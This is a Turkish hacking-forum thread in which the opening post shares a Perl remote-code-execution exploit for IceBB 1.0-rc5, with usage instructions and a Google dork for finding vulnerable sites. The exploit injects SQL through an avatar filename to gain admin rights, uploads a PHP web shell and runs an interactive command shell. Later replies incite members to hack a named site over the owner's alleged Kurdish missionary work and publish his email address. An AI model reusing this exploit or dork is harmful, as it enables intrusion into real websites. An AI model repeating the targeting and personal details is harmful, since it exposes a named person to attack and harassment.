PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: sitede admin oluştur ve hackle :)


SoN-KraL
04-20-2007, 09:55 PM
Yapan=Hessam-x
Kullanımı=Bu Açık İle Sitede Admin Oluşturabilirsiniz Tabiki Bu Script'i Kullanan Sitelerde Neyse
perl exploitadı.pl Sitedeki Linkleri Sadece Üyelerimiz Görebilir..ı.com/icebb/ adminüyeliğinizinadı adminüyeliğinizinşifresi Aralarında Boşluk var.
Yani Örnek Olarakta Verdiği Gibi xpl.pl Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. str0ke 123456
Arama KOduna Gelince Arama KOdu Yoktu Ben Kendim BUldum Yanlışsa Şimdiden Özür Dilerim.
Google Dork=inurl:"/icebb/"
Not=3-4 Sayfalara Giderseniz Siteler Karşınıza Çıkmaya Başlar

Alınan Yer=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..


#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Code Execution Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access
#
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use LWP::UserAgent;
use Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "Sitedeki Linkleri Sadece Üyelerimiz Görebilir..".$host;

print q(
################################################## #########
# IceBB 1.0-rc5 Remote Code Exec Exploit #
# Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. #
################# (C)oded By Hessam-x #####################

);


if (@ARGV < 3) {
print " # usage : xpl.pl [host&path] [uname] [pass]\n";
print " # e.g : xpl.pl Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. str0ke 123456\n";
exit();
}

print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = Sitedeki Linkleri Sadece Üyelerimiz Görebilir..>new();

$xpl->cookie_jar( $cookie_jar );


$login = $xpl->post($url.'index.php',
Content => [
'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);

if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
$cookie = $1;
print " [~] Logined ...\n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}

$badcode = "', user_group='1";
$avata = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file' => [
undef,
'avatar.jpg'.$badcode,
Content_type => 'text/plain',
Content => 'MYAVATAR',
],
'submit' => 'Save',
],
);
$avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file' => [
undef,
'shell.php'.$badcode,
Content_type => 'text/plain',
Content => '<? echo 1 ; echo _START_ ; system(\$_GET[\'cmd\']); echo _END_ ; ?>',
],
'submit' => 'Save',
],
);
$test = $xpl->get($url.'index.php' ;
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
exit();
}
if($test->as_string =~ /profile=(.*?)'>/) {
$uid = $1;
print " [~] User id : $1 \n";
} else {
print " [?] please enter user id : ";
chomp($uid=<STDIN> ;
}

while ()
{
print "\n[Shell - type 'exit' for exit]\$ ";
chomp($exc=<STDIN> ;
&sys($exc);
}
sub sys($exc) {
if ($exc eq 'exit' { exit() ; }
$res = $xpl->get($url.'uploads/av-'.$uid.'.php?cmd='.$exc);
@result = split(/\n/,$res->content);
$runned = 0;
$on = 0;
for $res(@result) {
if ($res =~ /^_END_/) { print "\n"; return 0; }
if ($on == 0) { print " $res\n"; }
if ($res =~ /^_START_/) { $on = 1; $runned = 1; }
}
if (!$runned) { print "\n Can not execute command . EXPLOIT FAILED !\n" ; exit(); };

}


print "\n ################################################## ## \n";

# milw0rm.com [2007-03-26]

watansewer
04-20-2007, 09:56 PM
saol paylaşım için

ozancem
04-20-2007, 09:59 PM
teşekkürler!

digital
04-20-2007, 10:19 PM
paylaşım için saol

Aksel
04-20-2007, 10:21 PM
paylasımın güzel tesk.

CeyPoweR
04-22-2007, 12:40 AM
paylaşımın adı güzelde işe yaramıyo kii

by_casus
04-22-2007, 12:46 AM
saol....

RainForest
04-22-2007, 12:51 AM
arkadaşlar kendine ben heckerim diyen kürt misyonerliğini yapan bi domain verecem Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. sahibinin msn adresinide verecem iboyildiz@hotmail.com en son bunu kulanıyodu bu domaine iki tvde bağlı demtv sutv KENDİNE TÜRK EVLADIYIM DYOSAN VE ANLYOSAN HECKLEYİN

maxiyesil
04-22-2007, 04:42 AM
bu işe yaramaz..

md5
04-22-2007, 01:33 PM
güzel paylaşım

SoN-KraL
04-22-2007, 01:36 PM
ben size yöntem kulanmanız için yol göstermeye çalıştım sadece ve karşılığında sizden emeğime saygı göstermenizi bekleridim :(

Ultra_Hack
04-26-2007, 01:31 PM
Güzel Paylaşım Kardeşim Saol
(H) (A) (C) (K) (E) (R)
Bizimle UĞRAŞMAK
|G|ÜVEN
|Ö|ZVERİ
|T|ECRÜBE
İSTER
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

K1LL_B1LL
04-26-2007, 01:35 PM
sağol kardeş pek anlıyamadım ama :D

ßy_™ «©ßªdߨ¥©» ™
04-26-2007, 01:39 PM
paylasıım cok gzl tesekkurler

magickeyboard
04-26-2007, 02:11 PM
paylaşım için sağol

OSAKA_79
04-26-2007, 02:24 PM
paylaşım için teşekkür

iiihey
04-26-2007, 02:42 PM
saol paylaşım için

east46
04-26-2007, 04:27 PM
paylaşım için eyvallah

arcger
04-27-2007, 12:39 AM
arkadaşlar kendine ben heckerim diyen kürt misyonerliğini yapan bi domain verecem Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. sahibinin msn adresinide verecem iboyildiz@hotmail.com en son bunu kulanıyodu bu domaine iki tvde bağlı demtv sutv KENDİNE TÜRK EVLADIYIM DYOSAN VE ANLYOSAN HECKLEYİN





ya şu siteyi hackleyin diye konu açmayın artık arkadaşlar reklamını yapıyorusnuz ama

semih_hamkiraz
04-27-2007, 12:52 AM
saol kardeş

atamet
04-27-2007, 05:34 PM
bişey olmaz bundan

atamet
04-27-2007, 05:35 PM
bencede

serenity
04-27-2007, 05:36 PM
paylasim icin saol kardes

danger32
04-27-2007, 05:40 PM
shell bılmeyenler ıcın bıraz daha acsaydın daha ıyı olurdu

FIRATEK387
04-27-2007, 05:44 PM
Bir işe yaramaz.Bende başlığı görünce bişey var sanmıştım.Yinde emeğe saygı tşk

polat48
04-27-2007, 05:51 PM
sağol paylaşım için

OnDeR
04-27-2007, 07:01 PM
teşekkürler kardes ya benim msn yi kaydedermisin... emege saygı

alerk
04-28-2007, 07:46 PM
eyvallah

hudai_63
04-28-2007, 08:10 PM
Saol Aga

IQ'99.9
04-28-2007, 08:14 PM
tbr. emeğe saygı

SoN-KraL
04-28-2007, 09:14 PM
işe yaramaz olsaydı foruma koymazdım arkadaşlar

boris
04-29-2007, 12:05 AM
Güzelmiş saol

istanbullu_delifisek
06-19-2007, 03:53 PM
çok güzelmiş dostum sağolasın:D....dewam

Spy-X
06-19-2007, 04:12 PM
eyvallah

clubberboy
06-19-2007, 04:21 PM
paylaşımın adı güzelde işe yaramıyo kii

Dogri katılıyorum

m3g3c
06-20-2007, 09:31 PM
Paylaşım için sağol

meMEThmet
06-20-2007, 09:55 PM
güzel paylaşım..
denemedim ama pek tutmaz gibi geliyo

MÜŞFİCK
06-20-2007, 10:00 PM
saol güzel paylaşım.....

gokzr
06-20-2007, 10:57 PM
ty kardeş saolsın